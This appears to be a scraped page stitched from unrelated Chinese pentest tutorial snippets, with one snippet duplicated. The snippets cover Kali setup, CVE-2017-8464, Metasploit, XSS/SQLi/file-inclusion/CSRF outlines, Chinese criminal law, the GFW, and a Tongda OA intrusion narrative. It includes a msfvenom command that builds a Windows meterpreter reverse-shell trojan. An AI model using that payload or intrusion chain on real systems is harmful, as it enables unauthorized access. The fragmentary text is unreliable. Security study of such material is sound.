1安装VMware15.5,kali系统，桥接模式链接：https://pan.baidu.com/s/1Y3ftPnzCj0NaMQNDAhIUjw 提取码：3k2w 2修改sshd_configvim/etc/ssh/sshd_config去掉这两行注释完成后保存esc:wq!重启SSH服务/etc/init.d/sshrestart FinalShell链接成功，如下图提权/查看ipsudosuifconfig生成木马msfvenom-pwindows/meterpreter/reverse_tcplhost="192.168.71.128"lport=5000-fexe-o/root/

1安装VMware15.5,kali系统，桥接模式链接：https://pan.baidu.com/s/1Y3ftPnzCj0NaMQNDAhIUjw 提取码：3k2w 2修改sshd_configvim/etc/ssh/sshd_config去掉这两行注释完成后保存esc:wq!重启SSH服务/etc/init.d/sshrestart FinalShell链接成功，如下图提权/查看ipsudosuifconfig生成木马msfvenom-pwindows/meterpreter/reverse_tcplhost="192.168.71.128"lport=5000-fexe-o/root/

 说明：本章内容，仅供学习，不要用于非法用途（做个好白帽）（一）震网三代漏洞“震网三代”官方漏洞编号是CVE-2017-8464，2017年6月13日，微软官方发布编号为CVE-2017-8464的漏洞公告，官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞，黑客可以通过U盘、网络共享等途径触发漏洞，完全控制用户系统，安全风险高危传播的载体一般是LNK，LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。被攻击机插入存在攻击lnk的U盘后会反弹shell，哪怕是被隔离的内网，也可以在不上网的情况下被攻击后来发现该漏洞曾被攻击者用于攻击中国地震局的自动地震台网

文章目录Metasploit渗透测试框架基于TCP协议收集主机信息开放端口扫描db_nmap查询网段内在线存活的主机半连接的方式进行半连接扫描使用auxiliary/sniffer下的psunffle模块进行密码嗅探基于SNMP协议收集主机信息基于SSH协议收集主机信息实战-制作Linux恶意病毒获取公司服务权限实战-利用deb包-0day-java环境进行渗透Metasploit渗透测试框架一下笔记为观看课程得出https://www.bilibili.com/video/BV127411c7yE?p=6&spm_id_from=pageDriver&vd_source=5294f3174c

文章目录前言一、Web_For_Pentester1.实验环境2.XSS跨站脚本2.1Example12.2Example22.3Example32.4Example42.5Example52.1Example62.1Example72.1Example82.1Example93.SQL注入3.1Example13.2Example23.3Example33.4Example4

《中华人民共和国刑法》第二百八十六条违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。违反国家规定，对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作，后果严重的，依照前款的规定处罚。故意制作、传播计算机病毒等破坏性程序，影响计算机系统正常运行，后果严重的，依照第一款的规定处罚。单位犯前三款罪的，对单位判处罚金，并对其直接负责的主管人员和其他直接责任人员，依照第一款的规定处罚。第二百八十六条之一网络服务提供者不履行法律、行政法规规定的信息网络安全管

文章目录前言一、文件包含漏洞原理利用防御1.原理1.1简介1.2分类1.3代码1.3.1shell语句1.3.2包含语句2.渗透2.1低安全级别2.1.1本地文件包含2.1.2远程文件包含2.1.3文件包含+Webshell2.1.3.1本地文件包含+一句话木马2.1.3.2远程文件包含+一句话木马2.1.3.2文件包含+PHP封装协议2.2中安全级别2.3高安全级别3.防御

文章目录1.baidu.com请求过程2.GFW原理2.1GFW拦截方法1:DNS渲染2.2通过IP黑名单2.3VPN阻断1.baidu.com请求过程家庭的路由器具备了交换机的功能.域名–>ip,优先检测本地的缓存,没有的话就查找DNS服务器,传输层对应该层的数据进行封装增加了端口的信息,网络层对传输层的数据进一步封装,加上了IP.最后得到“192.168.1.108.8.8.840453告诉我百度的IP”因为8.8.8.8不在同一网段,链路层需要找网关192.168.1.1.此时数据链路层在信息加上MAC地址,同一网段的交互信息是只靠MAC地址.此时给网关的信息为:“AA-AA-AA-AA

文章目录前言一、CSRF跨站请求伪造漏洞原理利用防御实战1.原理1.1CSRF简介1.2会话机制1.3总结2.渗透2.1BeEF+XSS实现CSRF（GET方法实现密码修改）2.2BeEF+BurpSuite实现CSRF（POST方法实现信息提交）3.防御3.1二次认证3.2令牌（Token）3.3其他方法前言CSRF（Cross-SiteRequestForgery，跨站请求伪造）攻击是一种常见的网络安全漏洞，在网站应用中比较常见。攻击者利用用户已经登录的身份，在用户不知情的情况下，以用户的名义完成非法操作，

1、通过信息搜集，发现目标有一个外网访问的通达OA系统2、通达OA的漏洞是非常多的，这里利用大佬写好的通达OA一键getshell工具成功获取webshell3、连接webshell，上传cs马儿到服务器4、执行获取主机权限成功上线5、通过Ladon插件发现系统有2张网卡，有一个内网ip，10.0.20.986、因为目标是win7系统，可以直接抓取明文密码7、使用ladon插件开启目标3389桌面使用socket代理使用proxifier代理软件，成功连接入目标内网8、使用抓取到的远程登陆目标服务器上传fscan到目标服务器，扫描内网网段，发现内网中有一台服务器有redis未授权访问漏洞9、因